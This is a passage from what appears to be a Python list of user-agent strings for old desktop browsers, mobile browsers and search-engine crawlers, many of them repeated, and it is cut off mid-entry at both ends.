rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 